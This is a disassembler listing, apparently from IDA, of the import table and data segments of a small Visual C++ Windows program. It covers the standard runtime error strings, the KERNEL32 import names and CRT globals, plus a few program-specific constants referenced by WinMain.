; UINT __stdcall GetOEMCP()
		extrn GetOEMCP:dword	; DATA XREF: _getSystemCP+1Ar
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
		extrn VirtualAlloc:dword ; CODE	XREF: ___sbh_alloc_new_region+76p
					; ___sbh_alloc_new_group+51p
					; DATA XREF: ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
		extrn HeapReAlloc:dword	; CODE XREF: ___sbh_alloc_new_region+28p
					; DATA XREF: ___sbh_alloc_new_region+28r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
		extrn GetProcAddress:dword ; CODE XREF:	___crtMessageBoxA+2Ap
					; ___crtMessageBoxA+3Bp ...
; HMODULE __stdcall LoadLibraryA(LPCSTR	lpLibFileName)
		extrn LoadLibraryA:dword ; CODE	XREF: ___crtMessageBoxA+12p
					; DATA XREF: ___crtMessageBoxA+12r
; int __stdcall	MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr,	int cchWideChar)
		extrn MultiByteToWideChar:dword	; CODE XREF: ___crtLCMapStringA+DFp
					; ___crtLCMapStringA+137p ...
; int __stdcall	LCMapStringA(LCID Locale, DWORD	dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
		extrn LCMapStringA:dword ; CODE	XREF: ___crtLCMapStringA+5Ep
					; ___crtLCMapStringA+A7p
					; DATA XREF: ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr,	int cchSrc, LPWORD lpCharType)
		extrn GetStringTypeA:dword ; CODE XREF:	___crtGetStringTypeA+59p
					; ___crtGetStringTypeA+8Dp
					; DATA XREF: ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int	cchSrc,	LPWORD lpCharType)
		extrn GetStringTypeW:dword ; CODE XREF:	___crtGetStringTypeA+3Fp
					; ___crtGetStringTypeA+12Dp
					; DATA XREF: ...


; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read
_rdata		segment	para public 'DATA' use32
		assume cs:_rdata
		;org 4040B8h
dword_4040B8	dd 0FFFFFFFFh, 4015D5h,	4015E9h, 746E7572h, 20656D69h ;	DATA XREF: start+5o
		dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
		dd 0Ah,	474E4953h, 72726520h, 0A0D726Fh, 0
aDomainError	db 'DOMAIN error',0Dh,0Ah,0
		align 4
aR6028UnableToI	db 'R6028',0Dh,0Ah
		db '- unable to initialize heap',0Dh,0Ah,0
		align 10h
aR6027NotEnough	db 'R6027',0Dh,0Ah
		db '- not enough space for lowio initialization',0Dh,0Ah,0
		align 4
aR6026NotEnough	db 'R6026',0Dh,0Ah
		db '- not enough space for stdio initialization',0Dh,0Ah,0
		align 10h
aR6025PureVirtu	db 'R6025',0Dh,0Ah
		db '- pure virtual function call',0Dh,0Ah,0
		align 4
aR6024NotEnough	db 'R6024',0Dh,0Ah
		db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
		align 10h
aR6019UnableToO	db 'R6019',0Dh,0Ah
		db '- unable to open console device',0Dh,0Ah,0
		align 4
aR6018Unexpecte	db 'R6018',0Dh,0Ah
		db '- unexpected heap error',0Dh,0Ah,0
		align 10h
aR6017Unexpecte	db 'R6017',0Dh,0Ah
		db '- unexpected multithread lock error',0Dh,0Ah,0
		align 10h
aR6016NotEnough	db 'R6016',0Dh,0Ah
		db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra	db 0Dh,0Ah
		db 'abnormal program termination',0Dh,0Ah,0
		align 10h
aR6009NotEnough	db 'R6009',0Dh,0Ah
		db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough	db 'R6008',0Dh,0Ah
		db '- not enough space for arguments',0Dh,0Ah,0
		align 4
aR6002FloatingP	db 'R6002',0Dh,0Ah      ; DATA XREF: .data:off_405164o
		db '- floating point not loaded',0Dh,0Ah,0
		align 10h
aMicrosoftVisua	db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119o
		align 4
; char asc_404378[]
asc_404378	db 0Ah			; DATA XREF: __NMSG_WRITE+F1o
		db 0Ah,0
		align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr	db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3o
		db 0Ah
		db 'Program: ',0
		align 4
; char a___[]
a___		db '...',0              ; DATA XREF: __NMSG_WRITE+BFo
; char Source[]
Source		db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7Do
		align 4
; char aGetlastactivep[]
aGetlastactivep	db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3Do
		align 4
; char aGetactivewindo[]
aGetactivewindo	db 'GetActiveWindow',0  ; DATA XREF: ___crtMessageBoxA+35o
; char ProcName[]
ProcName	db 'MessageBoxA',0      ; DATA XREF: ___crtMessageBoxA+24o
; char LibFileName[]
LibFileName	db 'user32.dll',0       ; DATA XREF: ___crtMessageBoxA+Do
		align 10h
; char byte_4043F0[]
byte_4043F0	db 4 dup(0)		; DATA XREF: ___crtLCMapStringA+57o
					; ___crtGetStringTypeA+52o
; const	WCHAR SrcStr
SrcStr		dw 0			; DATA XREF: ___crtLCMapStringA+36o
					; ___crtGetStringTypeA+39o
		align 4
dword_4043F8	dd 0FFFFFFFFh, 40395Eh,	403962h, 0FFFFFFFFh, 403A12h, 403A16h
					; DATA XREF: ___crtLCMapStringA+5o
dword_404410	dd 0FFFFFFFFh, 403B96h,	403B9Ah	; DATA XREF: ___crtGetStringTypeA+5o
__IMPORT_DESCRIPTOR_KERNEL32 dd	rva off_404444 ; Import	Name Table
		dd 0			; Time stamp
		dd 0			; Forwarder Chain
		dd rva aKernel32_dll	; DLL Name
		dd rva LCMapStringW	; Import Address Table
		dd 5 dup(0)
;
; Import names for KERNEL32.dll
;
off_404444	dd rva word_4044FC	; DATA XREF: .rdata:__IMPORT_DESCRIPTOR_KERNEL32o
		dd rva word_40450C
		dd rva word_404526
		dd rva word_40453A
		dd rva word_40454C
		dd rva word_40455E
		dd rva word_40456C
		dd rva word_40457A
		dd rva word_40458E
		dd rva word_4045A2
		dd rva word_4045BE
		dd rva word_4045D4
		dd rva word_4045EE
		dd rva word_404608
		dd rva word_40461E
		dd rva word_404636
		dd rva word_404650
		dd rva word_404662
		dd rva word_404672
		dd rva word_404680
		dd rva word_404696
		dd rva word_4046A4
		dd rva word_4046B0
		dd rva word_4046C0
		dd rva word_4046CE
		dd rva word_4046DE
		dd rva word_4046EC
		dd rva word_4046FA
		dd rva word_404708
		dd rva word_404714
		dd rva word_404720
		dd rva word_40472C
		dd rva word_404748
		dd rva word_404760
		dd rva word_404778
		dd rva word_404784
		dd rva word_40478E
		dd rva word_40479A
		dd rva word_4047AA
		dd rva word_4047B8
		dd rva word_4047CA
		dd rva word_4047DA
		dd rva word_4047F0
		dd rva word_404800
		dd rva word_404812
		dd 0
word_4044FC	dw 23Bh			; DATA XREF: .rdata:off_404444o
		db 'LCMapStringW',0
		align 4
word_40450C	dw 206h			; DATA XREF: .rdata:00404448o
		db 'HeapAlloc',0
aKernel32_dll	db 'KERNEL32.dll',0     ; DATA XREF: .rdata:00404428o
		align 2
word_404526	dw 177h			; DATA XREF: .rdata:0040444Co
		db 'GetModuleHandleA',0
		align 2
word_40453A	dw 1AFh			; DATA XREF: .rdata:00404450o
		db 'GetStartupInfoA',0
word_40454C	dw 108h			; DATA XREF: .rdata:00404454o
		db 'GetCommandLineA',0
word_40455E	dw 1DEh			; DATA XREF: .rdata:00404458o
		db 'GetVersion',0
		align 4
word_40456C	dw 0AFh			; DATA XREF: .rdata:0040445Co
		db 'ExitProcess',0
word_40457A	dw 351h			; DATA XREF: .rdata:00404460o
		db 'TerminateProcess',0
		align 2
word_40458E	dw 13Ah			; DATA XREF: .rdata:00404464o
		db 'GetCurrentProcess',0
word_4045A2	dw 362h			; DATA XREF: .rdata:00404468o
		db 'UnhandledExceptionFilter',0
		align 2
word_4045BE	dw 175h			; DATA XREF: .rdata:0040446Co
		db 'GetModuleFileNameA',0
		align 4
word_4045D4	dw 0EDh			; DATA XREF: .rdata:00404470o
		db 'FreeEnvironmentStringsA',0
word_4045EE	dw 0EEh			; DATA XREF: .rdata:00404474o
		db 'FreeEnvironmentStringsW',0
word_404608	dw 389h			; DATA XREF: .rdata:00404478o
		db 'WideCharToMultiByte',0
word_40461E	dw 14Dh			; DATA XREF: .rdata:0040447Co
		db 'GetEnvironmentStrings',0
word_404636	dw 14Fh			; DATA XREF: .rdata:00404480o
		db 'GetEnvironmentStringsW',0
		align 10h
word_404650	dw 319h			; DATA XREF: .rdata:00404484o
		db 'SetHandleCount',0
		align 2
word_404662	dw 1B1h			; DATA XREF: .rdata:00404488o
		db 'GetStdHandle',0
		align 2
word_404672	dw 15Eh			; DATA XREF: .rdata:0040448Co
		db 'GetFileType',0
word_404680	dw 13Eh			; DATA XREF: .rdata:00404490o
		db 'GetCurrentThreadId',0
		align 2
word_404696	dw 359h			; DATA XREF: .rdata:00404494o
		db 'TlsSetValue',0
word_4046A4	dw 356h			; DATA XREF: .rdata:00404498o
		db 'TlsAlloc',0
		align 10h
word_4046B0	dw 31Dh			; DATA XREF: .rdata:0040449Co
		db 'SetLastError',0
		align 10h
word_4046C0	dw 358h			; DATA XREF: .rdata:004044A0o
		db 'TlsGetValue',0
word_4046CE	dw 169h			; DATA XREF: .rdata:004044A4o
		db 'GetLastError',0
		align 2
word_4046DE	dw 20Ah			; DATA XREF: .rdata:004044A8o
		db 'HeapDestroy',0
word_4046EC	dw 208h			; DATA XREF: .rdata:004044ACo
		db 'HeapCreate',0
		align 2
word_4046FA	dw 378h			; DATA XREF: .rdata:004044B0o
		db 'VirtualFree',0
word_404708	dw 20Ch			; DATA XREF: .rdata:004044B4o
		db 'HeapFree',0
		align 4
word_404714	dw 2CCh			; DATA XREF: .rdata:004044B8o
		db 'RtlUnwind',0
word_404720	dw 397h			; DATA XREF: .rdata:004044BCo
		db 'WriteFile',0
word_40472C	dw 219h			; DATA XREF: .rdata:004044C0o
		db 'InitializeCriticalSection',0
word_404748	dw 8Fh			; DATA XREF: .rdata:004044C4o
		db 'EnterCriticalSection',0
		align 10h
word_404760	dw 247h			; DATA XREF: .rdata:004044C8o
		db 'LeaveCriticalSection',0
		align 4
word_404778	dw 0FCh			; DATA XREF: .rdata:004044CCo
		db 'GetCPInfo',0
word_404784	dw 0F5h			; DATA XREF: .rdata:004044D0o
		db 'GetACP',0
		align 2
word_40478E	dw 18Bh			; DATA XREF: .rdata:004044D4o
		db 'GetOEMCP',0
		align 2
word_40479A	dw 375h			; DATA XREF: .rdata:004044D8o
		db 'VirtualAlloc',0
		align 2
word_4047AA	dw 210h			; DATA XREF: .rdata:004044DCo
		db 'HeapReAlloc',0
word_4047B8	dw 198h			; DATA XREF: .rdata:004044E0o
		db 'GetProcAddress',0
		align 2
word_4047CA	dw 248h			; DATA XREF: .rdata:004044E4o
		db 'LoadLibraryA',0
		align 2
word_4047DA	dw 26Bh			; DATA XREF: .rdata:004044E8o
		db 'MultiByteToWideChar',0
word_4047F0	dw 23Ah			; DATA XREF: .rdata:004044ECo
		db 'LCMapStringA',0
		align 10h
word_404800	dw 1B2h			; DATA XREF: .rdata:004044F0o
		db 'GetStringTypeA',0
		align 2
word_404812	dw 1B5h			; DATA XREF: .rdata:004044F4o
		db 'GetStringTypeW',0
		align 800h
_rdata		ends

; Section 3. (virtual address 00005000)
; Virtual size			: 00000E9C (   3740.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 00005000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_data		segment	para public 'DATA' use32
		assume cs:_data
		;org 405000h
dword_405000	dd 0			; DATA XREF: __cinit+1Fo
dword_405004	dd 0			; DATA XREF: __cinit+1Ao
dword_405008	dd 0			; DATA XREF: __cinit+10o
		dd offset ___initmbctable
dword_405010	dd 0			; DATA XREF: __cinit:loc_401648o
dword_405014	dd 0			; DATA XREF: _doexit+6Ao
dword_405018	dd 0			; DATA XREF: _doexit:loc_4016F1o
dword_40501C	dd 0			; DATA XREF: _doexit+7Bo
dword_405020	dd 4 dup(0)		; DATA XREF: _doexit:loc_401702o
dword_405030	dd 1A096Eh, 0D6056h, 0D7656h, 380C56h, 3980F62h, 1BB22h
					; DATA XREF: WinMain(x,x,x,x)+5Do
		dd 0DC8Ah, 3492ACh, 19A42h, 346A1CEh, 0D23230h,	33CF96h
		dd 0DE3230h, 0DD414h, 38C78Ch, 38D13Ch
dword_405070	dd 0EDD8440h		; DATA XREF: WinMain(x,x,x,x)+71o
					; WinMain(x,x,x,x)+9Er
dword_405074	dd 702E1A8h		; DATA XREF: WinMain(x,x,x,x)+A9r
aFjfd		db 'fjfd',0             ; DATA XREF: sub_401001+12o
		align 10h
aKuee		db 'kuee',0             ; DATA XREF: sub_401001+8o
		align 4
word_405088	dw 34h			; DATA XREF: WinMain(x,x,x,x)+Fr
		align 4
dword_40508C	dd 313936h		; DATA XREF: WinMain(x,x,x,x)+6r
off_405090	dd offset __exit	; DATA XREF: __amsg_exit+1Cr
dword_405094	dd 2			; DATA XREF: __FF_MSGBANNER+Er
					; __NMSG_WRITE+46r
dword_405098	dd 0C0000005h, 0Bh, 0	; DATA XREF: __initptd+4o
		dd 0C000001Dh, 4, 0
		dd 0C0000096h, 4, 0
		dd 0C000008Dh, 8, 0
		dd 0C000008Eh, 8, 0
		dd 0C000008Fh, 8, 0
		dd 0C0000090h, 8, 0
		dd 0C0000091h, 8, 0
		dd 0C0000092h, 8, 0
		dd 0C0000093h, 8, 0
dword_405110	dd 3			; DATA XREF: __XcptFilter+62r
					; __XcptFilter+86r
dword_405114	dd 7			; DATA XREF: __XcptFilter+68r
					; __XcptFilter+8Cr
		dd 78h
dword_40511C	dd 0Ah			; DATA XREF: _xcptlookup+4r
		dd 0FFFFFFFFh, 0A00h, 7	dup(0)
; DWORD	dwTlsIndex
dwTlsIndex	dd 0FFFFFFFFh		; DATA XREF: __mtinit+Fw __mtinit+28r	...
		dd 10h
dword_40514C	dd 19930520h, 4	dup(0)	; DATA XREF: .text:004020FBo
					; __NLG_Notify+2o
dword_405160	dd 2			; DATA XREF: __NMSG_WRITE+Eo
					; __NMSG_WRITE+28r
off_405164	dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FCr
					; __NMSG_WRITE+12Do
					; "R6002\r\n- floating point not loaded\r\n"
		dd 8, 4042FCh, 9, 4042D0h, 0Ah,	4042ACh, 10h, 404280h
		dd 11h,	404250h, 12h, 40422Ch, 13h, 404200h, 18h, 4041C8h
		dd 19h,	4041A0h, 1Ah, 404168h, 1Bh, 404130h, 1Ch, 404108h
		dd 78h,	4040F8h, 79h, 4040E8h, 7Ah, 4040D8h, 0FCh, 4040D4h
		dd 0FFh, 4040C4h
; LPCRITICAL_SECTION dword_4051F0
dword_4051F0	dd 0			; DATA XREF: __NMSG_WRITE+1Bo
					; __lock+7r ...
; LPCRITICAL_SECTION off_4051F4
off_4051F4	dd offset dword_405730	; DATA XREF: __mtinitlocks+1Fr
		dd 7 dup(0)
; LPCRITICAL_SECTION off_405214
off_405214	dd offset dword_405760	; DATA XREF: __mtinitlocks+17r
		dd 3 dup(0)
; LPCRITICAL_SECTION off_405224
off_405224	dd offset dword_405778	; DATA XREF: __mtinitlocks+Fr
		dd 3 dup(0)
; LPCRITICAL_SECTION lpCriticalSection
lpCriticalSection dd offset dword_405748 ; DATA	XREF: __mtinitlocks+7r
		dd 1Eh dup(0)
byte_4052B0	db 1			; DATA XREF: __setmbcp+EDr
		db 2, 4, 8
		align 8
dword_4052B8	dd 3A4h			; DATA XREF: __setmbcp+38o
aVyv		db '`ВyВ!',0            ; DATA XREF: __setmbcp+129o
		align 8
aJ		db 'ж▀',0               ; DATA XREF: __setmbcp+CCo
		align 10h
aBe		db 'бе',0
		align 8
		dd 0FCE09F81h, 0
		dd 0FC807E40h, 0
		dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE40h, 0
		dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
		dd 0FE81h, 0
		dd 0FE41h, 0
		dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
		dd 0FE81h, 0
		dd 0FEA17E40h, 0
		dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
		dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4053A8	dd 2 dup(0)		; DATA XREF: __setmbcp+45o
dword_4053B0	dd 3F8h			; DATA XREF: __heap_alloc+5r
					; _calloc+27r
		align 10h
		dd offset __ctype+2
		dd offset __ctype+2
		public __ctype
__ctype		dd    200000h		; DATA XREF: _x_ismbbtype+18r
					; .data:004053C0o ...
		unicode	0, <	    (((((		   H>
		dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
		dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
		dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
; void *Memory
Memory		dd 0			; DATA XREF: start+96w
					; __setenvp:loc_40193Fr ...
		align 8
dword_4055D8	dd 0			; DATA XREF: __amsg_exitr
					; _fast_error_exitr ...
		align 10h
dword_4055E0	dd 0			; DATA XREF: start+52w
dword_4055E4	dd 0			; DATA XREF: start+49w
dword_4055E8	dd 0			; DATA XREF: start+3Ew
dword_4055EC	dd 0			; DATA XREF: start+30w
dword_4055F0	dd 0			; DATA XREF: __setargv+91w
dword_4055F4	dd 0			; DATA XREF: __setargv+89w
		dd 0
dword_4055FC	dd 0			; DATA XREF: __setenvp+44w
		dd 3 dup(0)
dword_40560C	dd 0			; DATA XREF: __setargv+2Ew
		dd 0
byte_405614	db 0			; DATA XREF: _doexit+32w
		align 4
dword_405618	dd 0			; DATA XREF: _doexit+2Cw
dword_40561C	dd 0			; DATA XREF: _doexit+9r _doexit+97w
; char Filename[260]
Filename	db 104h	dup(0)		; DATA XREF: __setargv:loc_4019FDo
dword_405724	dd 0			; DATA XREF: ___crtGetEnvironmentStringsA+2r
					; ___crtGetEnvironmentStringsA+23w ...
dword_405728	dd 0			; DATA XREF: __FF_MSGBANNER+21r
		align 10h
dword_405730	dd 6 dup(0)		; DATA XREF: .data:off_4051F4o
dword_405748	dd 6 dup(0)		; DATA XREF: .data:lpCriticalSectiono
dword_405760	dd 6 dup(0)		; DATA XREF: .data:off_405214o
dword_405778	dd 6 dup(0)		; DATA XREF: .data:off_405224o
dword_405790	dd 0			; DATA XREF: __setmbcp:loc_4025ECr
					; _getSystemCP+4w ...
dword_405794	dd 0			; DATA XREF: ___crtMessageBoxA+3r
					; ___crtMessageBoxA+2Ew ...
dword_405798	dd 0			; DATA XREF: ___crtMessageBoxA+43w
					; ___crtMessageBoxA:loc_40370Ar
dword_40579C	dd 0			; DATA XREF: ___crtMessageBoxA+4Aw
					; ___crtMessageBoxA+60r
		dd 2 dup(0)
dword_4057A8	dd 0			; DATA XREF: ___crtGetStringTypeA+7Br
		dd 3 dup(0)
dword_4057B8	dd 0			; DATA XREF: _getSystemCP+3Ar
					; ___crtLCMapStringA+C0r ...
		align 10h
dword_4057C0	dd 0			; DATA XREF: ___crtLCMapStringA+28r
					; ___crtLCMapStringA+4Cw ...
dword_4057C4	dd 0			; DATA XREF: ___crtGetStringTypeA+26r
					; ___crtGetStringTypeA:loc_403B07w
dword_4057C8	dd 0			; DATA XREF: _mallocr
					; _calloc:loc_402E46r
dword_4057CC	dd 0			; DATA XREF: __callnewhr
dword_4057D0	dd 0			; DATA XREF: sub_401078+C5r
					; sub_401156+50w
dword_4057D4	dd 0			; DATA XREF: sub_401078:loc_401138r
					; sub_401156+37w
		align 10h
dword_4057E0	dd 0			; DATA XREF: sub_401372+6o
					; sub_4013DC+2Fw
		dd 28h dup(0)
dword_405884	dd 0			; DATA XREF: sub_401372+22r
		align 10h
dword_405890	dd 0			; DATA XREF: sub_401372+3Cw
					; sub_401372+55w
		dd 86h dup(0)
dword_405AAC	dd 0			; DATA XREF: WinMain(x,x,x,x)+CEw
					; sub_4013DC+5Fr
dword_405AB0	dd 0			; DATA XREF: sub_401078:loc_401088r
					; sub_401156+2Cw
		align 10h
dword_405AC0	dd 0			; DATA XREF: WinMain(x,x,x,x):loc_401206o
					; WinMain(x,x,x,x)+F1r	...
dword_405AC4	dd 0			; DATA XREF: WinMain(x,x,x,x)+F9r
					; WinMain(x,x,x,x)+11Cr
dword_405AC8	dd 0			; DATA XREF: WinMain(x,x,x,x)+100r
					; WinMain(x,x,x,x)+123r
		dd 4 dup(0)
dword_405ADC	dd 0			; DATA XREF: WinMain(x,x,x,x)+146r
		dd 7 dup(0)
dword_405AFC	dd 0			; DATA XREF: WinMain(x,x,x,x)+13Br
		dd 0
dword_405B04	dd 0			; DATA XREF: WinMain(x,x,x,x)+192r
dword_405B08	dd 0			; DATA XREF: sub_401042+23w
					; WinMain(x,x,x,x)+7Fr
		align 10h
dword_405B10	dd 0			; DATA XREF: sub_401372+2Br
					; sub_4013DC+3Fo ...
dword_405B14	dd 0			; DATA XREF: sub_401372+Cr
					; sub_401372+4Cr ...
		align 10h
dword_405B20	dd 0			; DATA XREF: sub_401372+15r
					; sub_401372+34r ...
dword_405B24	dd 0			; DATA XREF: sub_401078+3r
					; sub_401078+43r ...
dword_405B28	dd 0			; DATA XREF: sub_401078+18r
					; sub_401078+7Aw ...
dword_405B2C	dd 0			; DATA XREF: ___sbh_heap_init+32w
					; ___sbh_alloc_new_region+5r ...
dword_405B30	dd 0			; DATA XREF: ___sbh_free_block+239r
					; ___sbh_free_block+259r ...
dword_405B34	dd 0			; DATA XREF: ___sbh_heap_init+2Dw
					; ___sbh_free_block+310w ...
; void *Dst
Dst		dd 0			; DATA XREF: ___sbh_heap_init:loc_402E8Fw
					; ___sbh_free_block+22Cr ...
dword_405B3C	dd 0			; DATA XREF: ___sbh_heap_init+24w
					; ___sbh_find_blockr ...
; LPVOID lpMem
lpMem		dd 0			; DATA XREF: ___sbh_heap_init+15w
					; ___sbh_find_block+8r	...
; UINT CodePage
CodePage	dd 0			; DATA XREF: __setmbcp+1Br
					; __setmbcp+79w ...
		align 10h
dword_405B50	dd 3 dup(0)		; DATA XREF: __setmbcp+12Fo
					; __setmbcp+179o ...
dword_405B5C	dd 0			; DATA XREF: __setmbcp+114w
					; __setmbcp+168w ...
byte_405B60	db 0			; DATA XREF: _setSBUpLow:loc_4027C8w
					; _setSBUpLow:loc_4027E5w ...
		align 4
		dd 3Fh dup(0)
byte_405C60	db 0			; DATA XREF: __setmbcp+6Eo
					; __setmbcp+BEo ...
byte_405C61	db 0			; DATA XREF: _parse_cmdline+3Fr
					; _parse_cmdline+84r ...
		align 4
		dd 40h dup(0)
; LCID Locale
Locale		dd 0			; DATA XREF: __setmbcp+64w
					; __setmbcp+137w ...
; HANDLE hHeap
hHeap		dd 0			; DATA XREF: __heap_init+19w
					; __heap_init+29r ...
		dd 5 dup(0)
dword_405D80	dd 0			; DATA XREF: __ioinit:loc_401D87w
					; __ioinit+4Br	...
dword_405D84	dd 3Fh dup(0)		; DATA XREF: __ioinit+98o
; UINT uNumber
uNumber		dd 0			; DATA XREF: __ioinit+28w
					; __ioinit:loc_401DF5r	...
dword_405E84	dd 0			; DATA XREF: __setenvp+ADw
dword_405E88	dd 0			; DATA XREF: __wincmdlnr __setenvp+3r	...
dword_405E8C	dd 0			; DATA XREF: _doexit+43r
dword_405E90	dd 0			; DATA XREF: _doexit+3Ar _doexit+5Cr
dword_405E94	dd 0			; DATA XREF: __cinitr
dword_405E98	dd 0			; DATA XREF: start+8Cw	__wincmdln+Fr ...
		align 200h
_data		ends


		end start
